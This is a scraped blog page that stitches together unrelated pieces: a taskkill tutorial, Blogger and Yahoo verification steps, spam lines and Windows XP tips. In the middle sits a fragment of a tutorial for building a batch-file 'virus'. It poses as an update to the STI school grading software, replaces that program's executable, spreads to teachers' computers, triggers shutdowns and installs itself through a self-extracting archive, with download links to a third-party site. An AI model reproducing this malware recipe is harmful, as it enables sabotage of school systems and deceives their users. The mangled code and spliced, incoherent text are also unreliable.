This method is effective but not nearly as fun as killing a process in Command Prompt. Additionally, killing processes in Command Prompt provides much more control and the ability to end multiple processes at once.
All of this is possible with the TaskKill command. First, let's cover the basics. You can kill a process by the process ID (PID) or by image name (EXE filename).

Open up an Administrative level Command Prompt and run tasklist to see all of the running processes:

C:\>tasklist

Image Name PID Session Name Mem Usage
========================= ======== ================ ============
firefox.exe                  26356 Console             139,352 K
regedit.exe                  24244 Console               9,768 K
cmd.exe                      18664 Console               2,380 K
conhost.exe                   2528 Console               7,852 K
notepad.exe                  17364 Console               7,892 K
notepad.exe                  24696 Console              22,028 K
notepad.exe                  25304 Console               5,852 K
explorer.exe                  2864 Console              72,232 K

In the example above you can see the image name and the PID for each process. If you want to kill the firefox process run:

C:\>Taskkill /IM firefox.exe /F

or

C:\>Taskkill /PID 26356 /F

The /f flag is kills the process forcefully. Failure to use the /F flag will result in nothing happening in some cases. One example is whenever I want to kill the explorer.exe process I have to use the /F flag or else the process just does not terminate.

If you have multiple instances of an image open such as multiple firefox.exe processes, running the taskkill /IM firefox.exe command will kill all instances. When you specify the PID only the specific instane of firefox will be terminated.

The real power of taskkill are the filtering options that allow you to use the following variables and operators.

Variables:

STATUS

IMAGENAME

PID

SESSION

CPUTIME

MEMUSAGE

USERNAME

MODULES

SERVICES

WINDOWTITLE

Operators:

eq (equals)

ne (not equal)

gt (greater than)

lt (less than)

ge (greater than or equal)

le (less than or equal)

"*" is the wildcard.

You can use the variables and operators with the /FI filtering flag. For example, let's say you want to end all processes that have a window title that starts with "Internet":

C:\>taskkill /FI "WINDOWTITLE eq Internet*" /F

How about killing all processes running under the Steve account:

C:\>taskkill /FI "USERNAME eq Steve" /F

It is also possible to kill a process running on a remote computer with taskkill. Just run the following to kill notepad.exe on a remote computer called SteveDesktop:

C:\>taskkill /S SteveDesktop /U RemoteAccountName /P RemoteAccountPassword /IM notepad.exe /F

To learn more about taskkill run it with the /? command just like any other Windows command.

Running Shoes - Online Shopping

Generally everyone like to shop something because everyone likes new things to own and that really adds pride to self and the people around us.

Select “Submit Site Feed” and enter the URL of your Blog's site feed. You can use either:-

http://YOURBLOGNAME.blogspot.com/rss.xml

OR

http://YOURBLOGNAME.blogspot.com/atom.xml

Remember to replace YOURBLOGNAME with that of your Blog's. For Blogger blogs, do not add "www." to YOURBLOGNAME. Once the Sitemaps are submitted, click the “Authentication” link shown at the top right hand corner of the page.

You will now have to authenticate your site ownership with Yahoo!, by either uploading a verification file to your site, or adding a META tag to your site. The authentication via a META tag was only introduced by Yahoo! recently, on Jan 30, 2007.

Note: Blogs created under Blogger.com or Blogspot.com cannot upload a verification file in the root directory. The first method is therefore NOT applicable to you.

The only way to authenticate your Blogger.com and Blogspot.com blogs with Yahoo! is to add a META tag. Copy the META tag that is generated for you, and paste it in your site's home page in the first section of the page, before the first section. What you do is to go to your Blogger dashboard. Under Template ->Edit HTML, somewhere near the top of the script, add the META Tag as follows:-

<b:include data="'blog'" name="'all-head-content'/">

Remember to replace the META Tag with the code generated by Yahoo! Site Explorer. Once done, Save the Template. When you return to Yahoo! Site Explorer, click the button that says “Ready to Authenticate” as shown below.

You will see a message that says “Your site is pending authentication.” Check back later, and you will notice that your site is now indexed and crawled by Yahoo!

According to the Yahoo Site Explorer instructions:-

“If you have added the META tag, please keep the tag in your site's home page. We will revalidate your site ownership by checking this META tag regularly.”

It is alright to leave this meta tag as well as the Google sitemap meta tag in your template.

Louisville Real Estate

I came across this website - http://www.ballhomes.com/. I liked one particular point on this website. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg

Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:

@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat

Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

SPEEDING XP BY 60 TIMES

Speed up Booting Xp by 61 Times

run -> msconfig - Hit Enter

Awesome tricks Explained here for u Free! : Rahul Dutt Avasthy

Whenever you start your computer, you are faced with a few moments of thumb twiddling while Windows XP boots and prompts you to log on. Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Read More...

CHANGE FAT TO NTFS

change fat TO ntfs

To change ur File system from command prompt
type: convert c:/fs:ntfs(ex:'c' is the drive letter)

Read More...

STOP HIGHLIGHTING NEWLY INSTALLED PROGRAMS

Do Not Highlight Newly Installed Programs

Tired of that annoying little window that pops up to tell you that new software is
installed? However, this assignment might not suit your system; for example, you might have
mapped a network drive to the same letter that Windows assigns to a new drive. When you
want to change drive letters, follow these steps:

· Right-click My Computer, and then click Manage.

· Under Computer Management, click Disk Management. In the right pane, you'll see
your drives listed. CD-ROM drives are listed at the bottom of the pane.

Read More...

Turn Off Autoplay for Program CDs

How can you stop Windows XP from launching program CDs?
· Click Start, click Run, type GPEDIT.MSC to open Group Policy in the Microsoft
Management Console.

· Double-click Computer Configuration, double-click Administrative templates,
double-click System, and then click Turn off autoplay.

· The instructions on your screen describe how to configure this setting.
